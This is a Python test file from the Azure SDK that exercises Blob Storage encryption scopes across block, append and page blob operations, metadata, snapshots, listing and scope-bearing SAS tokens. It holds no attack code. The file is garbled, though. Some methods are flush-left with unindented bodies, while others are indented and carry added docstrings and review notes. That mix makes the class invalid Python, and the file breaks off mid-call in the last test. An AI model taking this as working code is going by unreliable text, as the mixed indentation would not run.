2015-01-05T15:57:17.000Z
|
2022-03-31T23:50:25.000Z
|
sdk/storage/azure-storage-blob/tests/test_cpk_n.py
|
v-xuto/azure-sdk-for-python
|
9c6296d22094c5ede410bc83749e8df8694ccacc
|
[
"MIT"
] | 1,916
|
2015-01-19T05:05:41.000Z
|
2022-03-31T19:36:44.000Z
|
# coding: utf-8
# -------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
# --------------------------------------------------------------------------
import pytest
from datetime import datetime, timedelta
from azure.core.exceptions import HttpResponseError
from azure.storage.blob import (
BlobServiceClient,
BlobType,
BlobBlock,
BlobSasPermissions,
ContainerEncryptionScope,
generate_blob_sas,
generate_account_sas, ResourceTypes, AccountSasPermissions, generate_container_sas, ContainerSasPermissions
)
from settings.testcase import BlobPreparer
from devtools_testutils.storage import StorageTestCase
# ------------------------------------------------------------------------------
# The encryption scope are pre-created using management plane tool ArmClient.
# So we can directly use the scope in the test.
TEST_ENCRYPTION_KEY_SCOPE = "antjoscope1"
TEST_CONTAINER_ENCRYPTION_KEY_SCOPE = ContainerEncryptionScope(
default_encryption_scope="containerscope")
TEST_CONTAINER_ENCRYPTION_KEY_SCOPE_DENY_OVERRIDE = {
"default_encryption_scope": "containerscope",
"prevent_encryption_scope_override": True
}
TEST_SAS_ENCRYPTION_SCOPE = "testscope1"
TEST_SAS_ENCRYPTION_SCOPE_2 = "testscope2"
# ------------------------------------------------------------------------------
class StorageCPKNTest(StorageTestCase):
def _setup(self, bsc):
    """Per-test setup: cache config, pick a container name, seed test bytes.

    The container is only created in live mode; creation failures
    (e.g. the container already exists) are deliberately ignored.
    """
    self.config = bsc._config
    self.container_name = self.get_resource_name('utcontainer')
    # prep some test data so that they can be used in upload tests
    self.byte_data = self.get_random_bytes(64 * 1024)
    if self.is_live:
        try:
            bsc.create_container(self.container_name)
        except Exception:
            # Was a bare 'except:', which would also swallow
            # KeyboardInterrupt/SystemExit; Exception keeps the
            # best-effort behaviour without that hazard.
            pass
def _teardown(self, bsc):
if self.is_live:
try:
bsc.delete_container(self.container_name)
except:
pass
return super(StorageCPKNTest, self).tearDown()
# --Helpers-----------------------------------------------------------------
def _get_blob_reference(self):
return self.get_resource_name("cpk")
def _create_block_blob(self, bsc, blob_name=None, data=None, encryption_scope=None, max_concurrency=1, overwrite=False):
blob_name = blob_name if blob_name else self._get_blob_reference()
blob_client = bsc.get_blob_client(self.container_name, blob_name)
data = data if data else b''
resp = blob_client.upload_blob(data, encryption_scope=encryption_scope, max_concurrency=max_concurrency, overwrite=overwrite)
return blob_client, resp
def _create_append_blob(self, bsc, encryption_scope=None):
blob_name = self._get_blob_reference()
blob = bsc.get_blob_client(
self.container_name,
blob_name)
blob.create_append_blob(encryption_scope=encryption_scope)
return blob
def _create_page_blob(self, bsc, encryption_scope=None):
blob_name = self._get_blob_reference()
blob = bsc.get_blob_client(
self.container_name,
blob_name)
blob.create_page_blob(1024 * 1024, encryption_scope=encryption_scope)
return blob
# -- Test cases for APIs supporting CPK ----------------------------------------------
@pytest.mark.playback_test_only
@BlobPreparer()
def test_put_block_and_put_block_list(self, storage_account_name, storage_account_key):
# Arrange
bsc = BlobServiceClient(
self.account_url(storage_account_name, "blob"),
credential=storage_account_key,
connection_data_block_size=1024,
max_single_put_size=1024,
min_large_block_upload_threshold=1024,
max_block_size=1024,
max_page_size=1024)
self._setup(bsc)
blob_client, _ = self._create_block_blob(bsc)
blob_client.stage_block('1', b'AAA', encryption_scope=TEST_ENCRYPTION_KEY_SCOPE)
blob_client.stage_block('2', b'BBB', encryption_scope=TEST_ENCRYPTION_KEY_SCOPE)
blob_client.stage_block('3', b'CCC', encryption_scope=TEST_ENCRYPTION_KEY_SCOPE)
# Act
block_list = [BlobBlock(block_id='1'), BlobBlock(block_id='2'), BlobBlock(block_id='3')]
put_block_list_resp = blob_client.commit_block_list(block_list,
encryption_scope=TEST_ENCRYPTION_KEY_SCOPE)
# Assert
self.assertIsNotNone(put_block_list_resp['etag'])
self.assertIsNotNone(put_block_list_resp['last_modified'])
self.assertTrue(put_block_list_resp['request_server_encrypted'])
self.assertEqual(put_block_list_resp['encryption_scope'], TEST_ENCRYPTION_KEY_SCOPE)
# Act get the blob content
blob = blob_client.download_blob()
# Assert content was retrieved with the cpk
self.assertEqual(blob.readall(), b'AAABBBCCC')
self.assertEqual(blob.properties.etag, put_block_list_resp['etag'])
self.assertEqual(blob.properties.last_modified, put_block_list_resp['last_modified'])
self.assertEqual(blob.properties.encryption_scope, TEST_ENCRYPTION_KEY_SCOPE)
self._teardown(bsc)
    @pytest.mark.live_test_only
    @BlobPreparer()
    def test_put_block_and_put_block_list_with_blob_sas(self, storage_account_name, storage_account_key):
        """Stage and commit blocks through a blob SAS carrying an encryption scope.

        No explicit ``encryption_scope`` is passed to the data-plane calls; the
        scope is supplied by the 'ses' field embedded in the SAS token.
        """
        # Arrange
        bsc = BlobServiceClient(
            self.account_url(storage_account_name, "blob"),
            credential=storage_account_key,
            connection_data_block_size=1024,
            max_single_put_size=1024,
            min_large_block_upload_threshold=1024,
            max_block_size=1024,
            max_page_size=1024)
        self._setup(bsc)
        blob_name = self._get_blob_reference()
        # Blob-scoped SAS with TEST_SAS_ENCRYPTION_SCOPE as its 'ses' field
        token1 = generate_blob_sas(
            storage_account_name,
            self.container_name,
            blob_name,
            account_key=storage_account_key,
            permission=BlobSasPermissions(read=True, write=True, delete=True),
            expiry=datetime.utcnow() + timedelta(hours=1),
            encryption_scope=TEST_SAS_ENCRYPTION_SCOPE,
        )
        blob_client = BlobServiceClient(self.account_url(storage_account_name, "blob"), token1)\
            .get_blob_client(self.container_name, blob_name)
        blob_client.stage_block('1', b'AAA')
        blob_client.stage_block('2', b'BBB')
        blob_client.stage_block('3', b'CCC')
        # Act
        block_list = [BlobBlock(block_id='1'), BlobBlock(block_id='2'), BlobBlock(block_id='3')]
        put_block_list_resp = blob_client.commit_block_list(block_list)
        # Assert: the service applied the scope taken from the SAS token
        self.assertIsNotNone(put_block_list_resp['etag'])
        self.assertIsNotNone(put_block_list_resp['last_modified'])
        self.assertTrue(put_block_list_resp['request_server_encrypted'])
        self.assertEqual(put_block_list_resp['encryption_scope'], TEST_SAS_ENCRYPTION_SCOPE)
        # Act get the blob content
        blob = blob_client.download_blob()
        # Assert content was retrieved with the cpk
        self.assertEqual(blob.readall(), b'AAABBBCCC')
        self.assertEqual(blob.properties.etag, put_block_list_resp['etag'])
        self.assertEqual(blob.properties.last_modified, put_block_list_resp['last_modified'])
        self.assertEqual(blob.properties.encryption_scope, TEST_SAS_ENCRYPTION_SCOPE)
        self._teardown(bsc)
    @pytest.mark.live_test_only
    @BlobPreparer()
    def test_put_block_and_put_block_list_with_blob_sas_fails(self, storage_account_name, storage_account_key):
        """Mismatched SAS 'ses' vs explicit encryption_scope fails; matching succeeds.

        Also verifies the blob can still be downloaded with a SAS whose 'ses'
        differs from the scope the blob was actually written with.
        """
        # Arrange
        bsc = BlobServiceClient(
            self.account_url(storage_account_name, "blob"),
            credential=storage_account_key,
            connection_data_block_size=1024,
            max_single_put_size=1024,
            min_large_block_upload_threshold=1024,
            max_block_size=1024,
            max_page_size=1024)
        self._setup(bsc)
        blob_name = self._get_blob_reference()
        token1 = generate_blob_sas(
            storage_account_name,
            self.container_name,
            blob_name,
            account_key=storage_account_key,
            permission=BlobSasPermissions(read=True, write=True, delete=True),
            expiry=datetime.utcnow() + timedelta(hours=1),
            encryption_scope=TEST_SAS_ENCRYPTION_SCOPE,
        )
        blob_client = BlobServiceClient(self.account_url(storage_account_name, "blob"), token1)\
            .get_blob_client(self.container_name, blob_name)
        # both ses in SAS and encryption_scopes are both set and have DIFFERENT values will throw exception
        with self.assertRaises(HttpResponseError):
            blob_client.stage_block('1', b'AAA', encryption_scope=TEST_ENCRYPTION_KEY_SCOPE)
        # both ses in SAS and encryption_scopes are both set and have SAME values will succeed
        blob_client.stage_block('1', b'AAA', encryption_scope=TEST_SAS_ENCRYPTION_SCOPE)
        # Act
        block_list = [BlobBlock(block_id='1')]
        # both ses in SAS and encryption_scopes are both set and have DIFFERENT values will throw exception
        with self.assertRaises(HttpResponseError):
            blob_client.commit_block_list(block_list, encryption_scope=TEST_ENCRYPTION_KEY_SCOPE)
        # both ses in SAS and encryption_scopes are both set and have SAME values will succeed
        put_block_list_resp = blob_client.commit_block_list(block_list, encryption_scope=TEST_SAS_ENCRYPTION_SCOPE)
        # Assert
        self.assertIsNotNone(put_block_list_resp['etag'])
        self.assertIsNotNone(put_block_list_resp['last_modified'])
        self.assertTrue(put_block_list_resp['request_server_encrypted'])
        self.assertEqual(put_block_list_resp['encryption_scope'], TEST_SAS_ENCRYPTION_SCOPE)
        # generate a sas with a different encryption scope
        token2 = generate_blob_sas(
            storage_account_name,
            self.container_name,
            blob_name,
            account_key=storage_account_key,
            permission=BlobSasPermissions(read=True, write=True, delete=True),
            expiry=datetime.utcnow() + timedelta(hours=1),
            encryption_scope=TEST_ENCRYPTION_KEY_SCOPE,
        )
        blob_client_diff_encryption_scope_sas = BlobServiceClient(self.account_url(storage_account_name, "blob"), token2)\
            .get_blob_client(self.container_name, blob_name)
        # blob can be downloaded successfully no matter which encryption scope is used on the blob actually
        # the encryption scope on blob is TEST_SAS_ENCRYPTION_SCOPE and ses is TEST_ENCRYPTION_KEY_SCOPE in SAS token,
        # while we can still download the blob successfully
        blob = blob_client_diff_encryption_scope_sas.download_blob()
        # Assert content was retrieved with the cpk
        self.assertEqual(blob.readall(), b'AAA')
        self.assertEqual(blob.properties.etag, put_block_list_resp['etag'])
        self.assertEqual(blob.properties.last_modified, put_block_list_resp['last_modified'])
        self.assertEqual(blob.properties.encryption_scope, TEST_SAS_ENCRYPTION_SCOPE)
        self._teardown(bsc)
    @pytest.mark.live_test_only
    @pytest.mark.playback_test_only
    @BlobPreparer()
    def test_create_block_blob_with_chunks(self, storage_account_name, storage_account_key):
        """Parallel chunked block-blob upload with an encryption scope.

        NOTE(review): both ``live_test_only`` and ``playback_test_only`` are
        applied to this test, which looks contradictory — confirm which mode
        this test is intended to run in.
        """
        # parallel operation
        # test chunking functionality by reducing the size of each chunk,
        # otherwise the tests would take too long to execute
        bsc = BlobServiceClient(
            self.account_url(storage_account_name, "blob"),
            credential=storage_account_key,
            connection_data_block_size=1024,
            max_single_put_size=1024,
            min_large_block_upload_threshold=1024,
            max_block_size=1024,
            max_page_size=1024)
        self._setup(bsc)
        # Arrange
        # to force the in-memory chunks to be used
        self.config.use_byte_buffer = True
        # Act
        # create_blob_from_bytes forces the in-memory chunks to be used
        blob_client, upload_response = self._create_block_blob(bsc, data=self.byte_data, encryption_scope=TEST_ENCRYPTION_KEY_SCOPE,
                                                               max_concurrency=2)
        # Assert
        self.assertIsNotNone(upload_response['etag'])
        self.assertIsNotNone(upload_response['last_modified'])
        self.assertTrue(upload_response['request_server_encrypted'])
        self.assertEqual(upload_response['encryption_scope'], TEST_ENCRYPTION_KEY_SCOPE)
        # Act get the blob content
        blob = blob_client.download_blob()
        # Assert content was retrieved with the cpk
        self.assertEqual(blob.readall(), self.byte_data)
        self.assertEqual(blob.properties.etag, upload_response['etag'])
        self.assertEqual(blob.properties.last_modified, upload_response['last_modified'])
        self._teardown(bsc)
@pytest.mark.live_test_only
@pytest.mark.playback_test_only
@BlobPreparer()
def test_create_block_blob_with_sub_streams(self, storage_account_name, storage_account_key):
# problem with the recording framework can only run live
# test chunking functionality by reducing the size of each chunk,
# otherwise the tests would take too long to execute
bsc = BlobServiceClient(
self.account_url(storage_account_name, "blob"),
credential=storage_account_key,
connection_data_block_size=1024,
max_single_put_size=1024,
min_large_block_upload_threshold=1024,
max_block_size=1024,
max_page_size=1024)
self._setup(bsc)
# Act
# create_blob_from_bytes forces the in-memory chunks to be used
blob_client, upload_response = self._create_block_blob(bsc, data=self.byte_data, encryption_scope=TEST_ENCRYPTION_KEY_SCOPE,
max_concurrency=2)
# Assert
self.assertIsNotNone(upload_response['etag'])
self.assertIsNotNone(upload_response['last_modified'])
self.assertTrue(upload_response['request_server_encrypted'])
self.assertEqual(upload_response['encryption_scope'], TEST_ENCRYPTION_KEY_SCOPE)
# Act get the blob content
blob = blob_client.download_blob()
# Assert content was retrieved with the cpk
self.assertEqual(blob.readall(), self.byte_data)
self.assertEqual(blob.properties.etag, upload_response['etag'])
self.assertEqual(blob.properties.last_modified, upload_response['last_modified'])
self._teardown(bsc)
@pytest.mark.playback_test_only
@BlobPreparer()
def test_create_block_blob_with_single_chunk(self, storage_account_name, storage_account_key):
# Act
# test chunking functionality by reducing the size of each chunk,
# otherwise the tests would take too long to execute
bsc = BlobServiceClient(
self.account_url(storage_account_name, "blob"),
credential=storage_account_key,
connection_data_block_size=1024,
max_single_put_size=1024,
min_large_block_upload_threshold=1024,
max_block_size=1024,
max_page_size=1024)
self._setup(bsc)
data = b'AAABBBCCC'
# create_blob_from_bytes forces the in-memory chunks to be used
blob_client, upload_response = self._create_block_blob(bsc, data=data, encryption_scope=TEST_ENCRYPTION_KEY_SCOPE)
# Assert
self.assertIsNotNone(upload_response['etag'])
self.assertIsNotNone(upload_response['last_modified'])
self.assertTrue(upload_response['request_server_encrypted'])
# Act get the blob content
blob = blob_client.download_blob()
# Assert content was retrieved with the cpk
self.assertEqual(blob.readall(), data)
self.assertEqual(blob.properties.etag, upload_response['etag'])
self.assertEqual(blob.properties.last_modified, upload_response['last_modified'])
self._teardown(bsc)
    @pytest.mark.playback_test_only
    @BlobPreparer()
    def test_put_block_from_url_and_commit_with_cpk(self, storage_account_name, storage_account_key):
        """Stage blocks from a source-blob URL into a scope-encrypted destination.

        Commit without the scope must fail; commit with the matching scope
        succeeds and the copied ranges round-trip.
        """
        # Arrange
        # test chunking functionality by reducing the size of each chunk,
        # otherwise the tests would take too long to execute
        bsc = BlobServiceClient(
            self.account_url(storage_account_name, "blob"),
            credential=storage_account_key,
            connection_data_block_size=1024,
            max_single_put_size=1024,
            min_large_block_upload_threshold=1024,
            max_block_size=1024,
            max_page_size=1024)
        self._setup(bsc)
        # create source blob and get source blob url
        source_blob_name = self.get_resource_name("sourceblob")
        self.config.use_byte_buffer = True  # Make sure using chunk upload, then we can record the request
        source_blob_client, _ = self._create_block_blob(bsc, blob_name=source_blob_name, data=self.byte_data)
        # Read-only SAS so the destination can fetch from the source URL
        source_blob_sas = generate_blob_sas(
            source_blob_client.account_name,
            source_blob_client.container_name,
            source_blob_client.blob_name,
            snapshot=source_blob_client.snapshot,
            account_key=source_blob_client.credential.account_key,
            permission=BlobSasPermissions(read=True),
            expiry=datetime.utcnow() + timedelta(hours=1)
        )
        source_blob_url = source_blob_client.url + "?" + source_blob_sas
        # create destination blob
        self.config.use_byte_buffer = False
        destination_blob_client, _ = self._create_block_blob(bsc, encryption_scope=TEST_ENCRYPTION_KEY_SCOPE)
        # Act part 1: make put block from url calls
        destination_blob_client.stage_block_from_url(block_id=1, source_url=source_blob_url,
                                                     source_offset=0, source_length=4 * 1024,
                                                     encryption_scope=TEST_ENCRYPTION_KEY_SCOPE)
        destination_blob_client.stage_block_from_url(block_id=2, source_url=source_blob_url,
                                                     source_offset=4 * 1024, source_length=4 * 1024,
                                                     encryption_scope=TEST_ENCRYPTION_KEY_SCOPE)
        # Assert blocks: both staged, none committed yet
        committed, uncommitted = destination_blob_client.get_block_list('all')
        self.assertEqual(len(uncommitted), 2)
        self.assertEqual(len(committed), 0)
        # commit the blocks without cpk should fail
        block_list = [BlobBlock(block_id='1'), BlobBlock(block_id='2')]
        with self.assertRaises(HttpResponseError):
            destination_blob_client.commit_block_list(block_list)
        # Act commit the blocks with cpk should succeed
        put_block_list_resp = destination_blob_client.commit_block_list(block_list,
                                                                        encryption_scope=TEST_ENCRYPTION_KEY_SCOPE)
        # Assert
        self.assertIsNotNone(put_block_list_resp['etag'])
        self.assertIsNotNone(put_block_list_resp['last_modified'])
        self.assertTrue(put_block_list_resp['request_server_encrypted'])
        # Act get the blob content
        blob = destination_blob_client.download_blob()
        # Assert content was retrieved with the cpk
        self.assertEqual(blob.readall(), self.byte_data[0: 8 * 1024])
        self.assertEqual(blob.properties.etag, put_block_list_resp['etag'])
        self.assertEqual(blob.properties.last_modified, put_block_list_resp['last_modified'])
        self._teardown(bsc)
@pytest.mark.playback_test_only
@BlobPreparer()
def test_append_block(self, storage_account_name, storage_account_key):
# Arrange
# test chunking functionality by reducing the size of each chunk,
# otherwise the tests would take too long to execute
bsc = BlobServiceClient(
self.account_url(storage_account_name, "blob"),
credential=storage_account_key,
connection_data_block_size=1024,
max_single_put_size=1024,
min_large_block_upload_threshold=1024,
max_block_size=1024,
max_page_size=1024)
self._setup(bsc)
blob_client = self._create_append_blob(bsc, encryption_scope=TEST_ENCRYPTION_KEY_SCOPE)
# Act
for content in [b'AAA', b'BBB', b'CCC']:
append_blob_prop = blob_client.append_block(content, encryption_scope=TEST_ENCRYPTION_KEY_SCOPE)
# Assert
self.assertIsNotNone(append_blob_prop['etag'])
self.assertIsNotNone(append_blob_prop['last_modified'])
self.assertTrue(append_blob_prop['request_server_encrypted'])
# Act get the blob content
blob = blob_client.download_blob()
# Assert content was retrieved with the cpk
self.assertEqual(blob.readall(), b'AAABBBCCC')
self._teardown(bsc)
    @pytest.mark.playback_test_only
    @BlobPreparer()
    def test_append_block_from_url(self, storage_account_name, storage_account_key):
        """Append a range from a source-blob URL into a scope-encrypted append blob."""
        # Arrange
        # test chunking functionality by reducing the size of each chunk,
        # otherwise the tests would take too long to execute
        bsc = BlobServiceClient(
            self.account_url(storage_account_name, "blob"),
            credential=storage_account_key,
            connection_data_block_size=1024,
            max_single_put_size=1024,
            min_large_block_upload_threshold=1024,
            max_block_size=1024,
            max_page_size=1024)
        self._setup(bsc)
        source_blob_name = self.get_resource_name("sourceblob")
        self.config.use_byte_buffer = True  # chunk upload
        source_blob_client, _ = self._create_block_blob(bsc, blob_name=source_blob_name, data=self.byte_data)
        # Read-only SAS so the destination can fetch from the source URL
        source_blob_sas = generate_blob_sas(
            source_blob_client.account_name,
            source_blob_client.container_name,
            source_blob_client.blob_name,
            snapshot=source_blob_client.snapshot,
            account_key=source_blob_client.credential.account_key,
            permission=BlobSasPermissions(read=True),
            expiry=datetime.utcnow() + timedelta(hours=1)
        )
        source_blob_url = source_blob_client.url + "?" + source_blob_sas
        self.config.use_byte_buffer = False
        destination_blob_client = self._create_append_blob(bsc, encryption_scope=TEST_ENCRYPTION_KEY_SCOPE)
        # Act: append the first 4 KiB of the source
        append_blob_prop = destination_blob_client.append_block_from_url(source_blob_url,
                                                                         source_offset=0,
                                                                         source_length=4 * 1024,
                                                                         encryption_scope=TEST_ENCRYPTION_KEY_SCOPE)
        # Assert
        self.assertIsNotNone(append_blob_prop['etag'])
        self.assertIsNotNone(append_blob_prop['last_modified'])
        self.assertTrue(append_blob_prop['request_server_encrypted'])
        self.assertEqual(append_blob_prop['encryption_scope'], TEST_ENCRYPTION_KEY_SCOPE)
        # Act get the blob content
        blob = destination_blob_client.download_blob()
        # Assert content was retrieved with the cpk
        self.assertEqual(blob.readall(), self.byte_data[0: 4 * 1024])
        self.assertEqual(blob.properties.encryption_scope, TEST_ENCRYPTION_KEY_SCOPE)
        self._teardown(bsc)
@pytest.mark.playback_test_only
@BlobPreparer()
def test_create_append_blob_with_chunks(self, storage_account_name, storage_account_key):
# Arrange
# test chunking functionality by reducing the size of each chunk,
# otherwise the tests would take too long to execute
bsc = BlobServiceClient(
self.account_url(storage_account_name, "blob"),
credential=storage_account_key,
connection_data_block_size=1024,
max_single_put_size=1024,
min_large_block_upload_threshold=1024,
max_block_size=1024,
max_page_size=1024)
self._setup(bsc)
blob_client = self._create_append_blob(bsc, encryption_scope=TEST_ENCRYPTION_KEY_SCOPE)
# Act
append_blob_prop = blob_client.upload_blob(self.byte_data,
blob_type=BlobType.AppendBlob, encryption_scope=TEST_ENCRYPTION_KEY_SCOPE)
# Assert
self.assertIsNotNone(append_blob_prop['etag'])
self.assertIsNotNone(append_blob_prop['last_modified'])
self.assertTrue(append_blob_prop['request_server_encrypted'])
self.assertEqual(append_blob_prop['encryption_scope'], TEST_ENCRYPTION_KEY_SCOPE)
# Act get the blob content
blob = blob_client.download_blob()
# Assert content was retrieved with the cpk
self.assertEqual(blob.readall(), self.byte_data)
self.assertEqual(blob.properties.encryption_scope, TEST_ENCRYPTION_KEY_SCOPE)
self._teardown(bsc)
@pytest.mark.playback_test_only
@BlobPreparer()
def test_update_page(self, storage_account_name, storage_account_key):
# Arrange
# test chunking functionality by reducing the size of each chunk,
# otherwise the tests would take too long to execute
bsc = BlobServiceClient(
self.account_url(storage_account_name, "blob"),
credential=storage_account_key,
connection_data_block_size=1024,
max_single_put_size=1024,
min_large_block_upload_threshold=1024,
max_block_size=1024,
max_page_size=1024)
self._setup(bsc)
blob_client = self._create_page_blob(bsc, encryption_scope=TEST_ENCRYPTION_KEY_SCOPE)
# Act
page_blob_prop = blob_client.upload_page(self.byte_data,
offset=0,
length=len(self.byte_data),
encryption_scope=TEST_ENCRYPTION_KEY_SCOPE)
# Assert
self.assertIsNotNone(page_blob_prop['etag'])
self.assertIsNotNone(page_blob_prop['last_modified'])
self.assertTrue(page_blob_prop['request_server_encrypted'])
self.assertEqual(page_blob_prop['encryption_scope'], TEST_ENCRYPTION_KEY_SCOPE)
# Act get the blob content
blob = blob_client.download_blob(offset=0,
length=len(self.byte_data))
# Assert content was retrieved with the cpk
self.assertEqual(blob.readall(), self.byte_data)
self.assertEqual(blob.properties.encryption_scope, TEST_ENCRYPTION_KEY_SCOPE)
self._teardown(bsc)
    @pytest.mark.playback_test_only
    @BlobPreparer()
    def test_update_page_from_url(self, storage_account_name, storage_account_key):
        """Write pages from a source-blob URL into a scope-encrypted page blob."""
        # Arrange
        # test chunking functionality by reducing the size of each chunk,
        # otherwise the tests would take too long to execute
        bsc = BlobServiceClient(
            self.account_url(storage_account_name, "blob"),
            credential=storage_account_key,
            connection_data_block_size=1024,
            max_single_put_size=1024,
            min_large_block_upload_threshold=1024,
            max_block_size=1024,
            max_page_size=1024)
        self._setup(bsc)
        source_blob_name = self.get_resource_name("sourceblob")
        self.config.use_byte_buffer = True  # Make sure using chunk upload, then we can record the request
        source_blob_client, _ = self._create_block_blob(bsc, blob_name=source_blob_name, data=self.byte_data)
        # Read-only SAS so the destination can fetch from the source URL
        source_blob_sas = generate_blob_sas(
            source_blob_client.account_name,
            source_blob_client.container_name,
            source_blob_client.blob_name,
            snapshot=source_blob_client.snapshot,
            account_key=source_blob_client.credential.account_key,
            permission=BlobSasPermissions(read=True),
            expiry=datetime.utcnow() + timedelta(hours=1)
        )
        source_blob_url = source_blob_client.url + "?" + source_blob_sas
        self.config.use_byte_buffer = False
        blob_client = self._create_page_blob(bsc, encryption_scope=TEST_ENCRYPTION_KEY_SCOPE)
        # Act: copy the whole payload from the source as page ranges
        page_blob_prop = blob_client.upload_pages_from_url(source_blob_url,
                                                           offset=0,
                                                           length=len(self.byte_data),
                                                           source_offset=0,
                                                           encryption_scope=TEST_ENCRYPTION_KEY_SCOPE)
        # Assert
        self.assertIsNotNone(page_blob_prop['etag'])
        self.assertIsNotNone(page_blob_prop['last_modified'])
        self.assertTrue(page_blob_prop['request_server_encrypted'])
        self.assertEqual(page_blob_prop['encryption_scope'], TEST_ENCRYPTION_KEY_SCOPE)
        # Act get the blob content
        blob = blob_client.download_blob(offset=0,
                                         length=len(self.byte_data))
        # Assert content was retrieved with the cpk
        self.assertEqual(blob.readall(), self.byte_data)
        self.assertEqual(blob.properties.encryption_scope, TEST_ENCRYPTION_KEY_SCOPE)
        self._teardown(bsc)
    @pytest.mark.live_test_only
    @pytest.mark.playback_test_only
    @BlobPreparer()
    def test_create_page_blob_with_chunks(self, storage_account_name, storage_account_key):
        """Parallel chunked page-blob upload with an encryption scope.

        NOTE(review): both ``live_test_only`` and ``playback_test_only`` are
        applied to this test, which looks contradictory — confirm which mode
        this test is intended to run in.
        """
        # Act
        # test chunking functionality by reducing the size of each chunk,
        # otherwise the tests would take too long to execute
        bsc = BlobServiceClient(
            self.account_url(storage_account_name, "blob"),
            credential=storage_account_key,
            connection_data_block_size=1024,
            max_single_put_size=1024,
            min_large_block_upload_threshold=1024,
            max_block_size=1024,
            max_page_size=1024)
        self._setup(bsc)
        blob_client = bsc.get_blob_client(self.container_name, self._get_blob_reference())
        page_blob_prop = blob_client.upload_blob(self.byte_data,
                                                 blob_type=BlobType.PageBlob,
                                                 max_concurrency=2,
                                                 encryption_scope=TEST_ENCRYPTION_KEY_SCOPE)
        # Assert
        self.assertIsNotNone(page_blob_prop['etag'])
        self.assertIsNotNone(page_blob_prop['last_modified'])
        self.assertTrue(page_blob_prop['request_server_encrypted'])
        self.assertEqual(page_blob_prop['encryption_scope'], TEST_ENCRYPTION_KEY_SCOPE)
        # Act get the blob content
        blob = blob_client.download_blob()
        # Assert content was retrieved with the cpk
        self.assertEqual(blob.readall(), self.byte_data)
        self.assertEqual(blob.properties.encryption_scope, TEST_ENCRYPTION_KEY_SCOPE)
        self._teardown(bsc)
@pytest.mark.playback_test_only
@BlobPreparer()
def test_get_set_blob_metadata(self, storage_account_name, storage_account_key):
# Arrange
# test chunking functionality by reducing the size of each chunk,
# otherwise the tests would take too long to execute
bsc = BlobServiceClient(
self.account_url(storage_account_name, "blob"),
credential=storage_account_key,
connection_data_block_size=1024,
max_single_put_size=1024,
min_large_block_upload_threshold=1024,
max_block_size=1024,
max_page_size=1024)
self._setup(bsc)
blob_client, _ = self._create_block_blob(bsc, data=b'AAABBBCCC', encryption_scope=TEST_ENCRYPTION_KEY_SCOPE)
# Act
blob_props = blob_client.get_blob_properties()
# Assert
self.assertTrue(blob_props.server_encrypted)
self.assertEqual(blob_props['encryption_scope'], TEST_ENCRYPTION_KEY_SCOPE)
# Act set blob properties
metadata = {'hello': 'world', 'number': '42', 'up': 'upval'}
with self.assertRaises(HttpResponseError):
blob_client.set_blob_metadata(
metadata=metadata,
)
blob_client.set_blob_metadata(metadata=metadata, encryption_scope=TEST_ENCRYPTION_KEY_SCOPE)
# Assert
blob_props = blob_client.get_blob_properties()
md = blob_props.metadata
self.assertEqual(3, len(md))
self.assertEqual(md['hello'], 'world')
self.assertEqual(md['number'], '42')
self.assertEqual(md['up'], 'upval')
self.assertFalse('Up' in md)
self._teardown(bsc)
@pytest.mark.playback_test_only
@BlobPreparer()
def test_snapshot_blob(self, storage_account_name, storage_account_key):
# Arrange
# test chunking functionality by reducing the size of each chunk,
# otherwise the tests would take too long to execute
bsc = BlobServiceClient(
self.account_url(storage_account_name, "blob"),
credential=storage_account_key,
connection_data_block_size=1024,
max_single_put_size=1024,
min_large_block_upload_threshold=1024,
max_block_size=1024,
max_page_size=1024)
self._setup(bsc)
blob_client, _ = self._create_block_blob(bsc, data=b'AAABBBCCC', encryption_scope=TEST_ENCRYPTION_KEY_SCOPE)
# Act without cpk should not work
with self.assertRaises(HttpResponseError):
blob_client.create_snapshot()
# Act with cpk should work
blob_snapshot = blob_client.create_snapshot(encryption_scope=TEST_ENCRYPTION_KEY_SCOPE)
# Assert
self.assertIsNotNone(blob_snapshot)
self._teardown(bsc)
@pytest.mark.playback_test_only
@BlobPreparer()
def test_list_blobs(self, storage_account_name, storage_account_key):
# Arrange
bsc = BlobServiceClient(
self.account_url(storage_account_name, "blob"),
credential=storage_account_key,
connection_data_block_size=1024,
max_single_put_size=1024,
min_large_block_upload_threshold=1024,
max_block_size=1024,
max_page_size=1024)
self._setup(bsc)
blob_client, _ = self._create_block_blob(bsc, blob_name="blockblob", data=b'AAABBBCCC', encryption_scope=TEST_ENCRYPTION_KEY_SCOPE)
self._create_append_blob(bsc, encryption_scope=TEST_ENCRYPTION_KEY_SCOPE)
container_client = bsc.get_container_client(self.container_name)
generator = container_client.list_blobs(include="metadata")
for blob in generator:
self.assertIsNotNone(blob)
# Assert: every listed blob has encryption_scope
self.assertEqual(blob.encryption_scope, TEST_ENCRYPTION_KEY_SCOPE)
self._teardown(bsc)
    @pytest.mark.live_test_only
    @BlobPreparer()
    def test_list_blobs_using_container_encryption_scope_sas(self, storage_account_name, storage_account_key):
        """Listing works even when the SAS 'ses' differs from the blobs' scope.

        Blobs are created through a SAS carrying TEST_SAS_ENCRYPTION_SCOPE and
        then listed through a SAS carrying TEST_ENCRYPTION_KEY_SCOPE.
        """
        # Arrange
        bsc = BlobServiceClient(
            self.account_url(storage_account_name, "blob"),
            credential=storage_account_key,
            connection_data_block_size=1024,
            max_single_put_size=1024,
            min_large_block_upload_threshold=1024,
            max_block_size=1024,
            max_page_size=1024)
        self._setup(bsc)
        # Container SAS carrying TEST_SAS_ENCRYPTION_SCOPE as 'ses'
        token = generate_container_sas(
            storage_account_name,
            self.container_name,
            storage_account_key,
            permission=ContainerSasPermissions(read=True, write=True, list=True, delete=True),
            expiry=datetime.utcnow() + timedelta(hours=1),
            encryption_scope=TEST_SAS_ENCRYPTION_SCOPE
        )
        bsc_with_sas_credential = BlobServiceClient(
            self.account_url(storage_account_name, "blob"),
            credential=token,
            connection_data_block_size=1024,
            max_single_put_size=1024,
            min_large_block_upload_threshold=1024,
            max_block_size=1024,
            max_page_size=1024)
        # blob is encrypted using TEST_SAS_ENCRYPTION_SCOPE
        blob_client, _ = self._create_block_blob(bsc_with_sas_credential, blob_name="blockblob", data=b'AAABBBCCC', overwrite=True)
        self._create_append_blob(bsc_with_sas_credential)
        # generate a token with TEST_ENCRYPTION_KEY_SCOPE
        token2 = generate_container_sas(
            storage_account_name,
            self.container_name,
            storage_account_key,
            permission=ContainerSasPermissions(read=True, write=True, list=True, delete=True),
